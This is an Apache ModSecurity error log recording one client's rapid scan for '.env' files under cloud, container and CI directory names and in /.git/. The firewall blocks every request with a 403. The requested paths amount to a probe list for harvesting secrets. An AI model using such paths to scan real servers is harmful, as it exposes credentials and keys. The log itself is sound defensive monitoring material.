[Mon May 11 18:03:36.435488 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92EWKUxpmnkK7zHyiTAAAAQ4"]
[Mon May 11 18:03:36.611739 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/bulk/.env"] [unique_id "agH92EWKUxpmnkK7zHyiTQAAAQ4"]
[Mon May 11 18:03:36.611959 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/bulk/.env"] [unique_id "agH92EWKUxpmnkK7zHyiTQAAAQ4"]
[Mon May 11 18:03:36.612264 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92EWKUxpmnkK7zHyiTQAAAQ4"]
[Mon May 11 18:03:36.976633 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/aws/.env"] [unique_id "agH92EWKUxpmnkK7zHyiTgAAAQ4"]
[Mon May 11 18:03:36.976864 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/aws/.env"] [unique_id "agH92EWKUxpmnkK7zHyiTgAAAQ4"]
[Mon May 11 18:03:36.977151 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92EWKUxpmnkK7zHyiTgAAAQ4"]
[Mon May 11 18:03:37.218663 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/azure/.env"] [unique_id "agH92UWKUxpmnkK7zHyiTwAAAQ4"]
[Mon May 11 18:03:37.218899 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/azure/.env"] [unique_id "agH92UWKUxpmnkK7zHyiTwAAAQ4"]
[Mon May 11 18:03:37.219230 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92UWKUxpmnkK7zHyiTwAAAQ4"]
[Mon May 11 18:03:37.547434 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/gcp/.env"] [unique_id "agH92UWKUxpmnkK7zHyiVQAAAQ4"]
[Mon May 11 18:03:37.547623 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/gcp/.env"] [unique_id "agH92UWKUxpmnkK7zHyiVQAAAQ4"]
[Mon May 11 18:03:37.547889 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92UWKUxpmnkK7zHyiVQAAAQ4"]
[Mon May 11 18:03:37.800020 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cloud/.env"] [unique_id "agH92UWKUxpmnkK7zHyiWgAAAQ4"]
[Mon May 11 18:03:37.800259 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cloud/.env"] [unique_id "agH92UWKUxpmnkK7zHyiWgAAAQ4"]
[Mon May 11 18:03:37.800577 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92UWKUxpmnkK7zHyiWgAAAQ4"]
[Mon May 11 18:03:38.064065 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/infrastructure/.env"] [unique_id "agH92kWKUxpmnkK7zHyiXQAAAQ4"]
[Mon May 11 18:03:38.064313 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/infrastructure/.env"] [unique_id "agH92kWKUxpmnkK7zHyiXQAAAQ4"]
[Mon May 11 18:03:38.064637 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92kWKUxpmnkK7zHyiXQAAAQ4"]
[Mon May 11 18:03:38.325219 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/docker/.env"] [unique_id "agH92kWKUxpmnkK7zHyiXgAAAQ4"]
[Mon May 11 18:03:38.325475 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/docker/.env"] [unique_id "agH92kWKUxpmnkK7zHyiXgAAAQ4"]
[Mon May 11 18:03:38.325810 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92kWKUxpmnkK7zHyiXgAAAQ4"]
[Mon May 11 18:03:38.587122 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/k8s/.env"] [unique_id "agH92kWKUxpmnkK7zHyiXwAAAQ4"]
[Mon May 11 18:03:38.587361 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/k8s/.env"] [unique_id "agH92kWKUxpmnkK7zHyiXwAAAQ4"]
[Mon May 11 18:03:38.587766 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92kWKUxpmnkK7zHyiXwAAAQ4"]
[Mon May 11 18:03:38.846649 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/kubernetes/.env"] [unique_id "agH92kWKUxpmnkK7zHyiYQAAAQ4"]
[Mon May 11 18:03:38.846882 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/kubernetes/.env"] [unique_id "agH92kWKUxpmnkK7zHyiYQAAAQ4"]
[Mon May 11 18:03:38.847231 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH92kWKUxpmnkK7zHyiYQAAAQ4"]
[Mon May 11 18:03:39.147002 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/terraform/.env"] [unique_id "agH920WKUxpmnkK7zHyiYwAAAQ4"]
[Mon May 11 18:03:39.147380 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/terraform/.env"] [unique_id "agH920WKUxpmnkK7zHyiYwAAAQ4"]
[Mon May 11 18:03:39.147878 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH920WKUxpmnkK7zHyiYwAAAQ4"]
[Mon May 11 18:03:39.414281 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/ansible/.env"] [unique_id "agH920WKUxpmnkK7zHyiZQAAAQ4"]
[Mon May 11 18:03:39.414816 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/ansible/.env"] [unique_id "agH920WKUxpmnkK7zHyiZQAAAQ4"]
[Mon May 11 18:03:39.415285 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH920WKUxpmnkK7zHyiZQAAAQ4"]
[Mon May 11 18:03:39.619518 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.git/.env"] [unique_id "agH920WKUxpmnkK7zHyiZgAAAQ4"]
[Mon May 11 18:03:39.619788 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.git/.env"] [unique_id "agH920WKUxpmnkK7zHyiZgAAAQ4"]
[Mon May 11 18:03:39.620137 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH920WKUxpmnkK7zHyiZgAAAQ4"]
[Mon May 11 18:03:39.835930 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/ci/.env"] [unique_id "agH920WKUxpmnkK7zHyiaAAAAQ4"]
[Mon May 11 18:03:39.836173 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/ci/.env"] [unique_id "agH920WKUxpmnkK7zHyiaAAAAQ4"]
[Mon May 11 18:03:39.836477 2026] [security2:error] [pid 1411055:tid 1411071] [client 54.67.78.1:56802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH920WKUxpmnkK7zHyiaAAAAQ4"]
